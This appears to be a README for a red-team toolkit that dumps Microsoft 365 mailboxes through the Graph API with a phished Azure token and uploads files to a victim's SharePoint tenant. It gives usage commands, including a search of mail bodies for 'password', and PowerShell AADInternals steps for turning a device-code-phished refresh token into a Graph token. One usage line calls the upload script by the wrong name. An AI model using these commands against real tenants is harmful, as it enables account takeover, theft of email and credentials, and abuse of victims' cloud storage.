
Script to dump emails through Microsoft Graph API

Primary LanguagePython


Script to dump emails through Microsoft Graph API. it also include another script to push a file on the Azure tenant.

Usage graph_dump.py

This script dump emails and attachments

python3 graph_dump.py extended_azure_token_file_path (optional filter)

Filter examples


python3 graph_dump.py extended_azure_token_file_path '$search="body:password"'

Usage push_sharepoint.py

This script can be used to host on file on an Azure tenant

python3 extract_email.py extended_azure_token_file_path file_to_upload_path remote_filename (optional -organization)

Device code phishing extended scope

PS> install-module aadinternals
PS> import-module addinternals
PS> $t = Get-AADIntAccessTokenWithRefreshToken -clientid "d3590ed6-52b3-4102-aeff-aad2292ab01c" -resource "https://graph.microsoft.com" -tenantid "" -refreshtoken "" -savetocache 1 -includerefreshtoken 1
PS> Write-Output $t


Mr.Un1k0d3r RingZer0 Team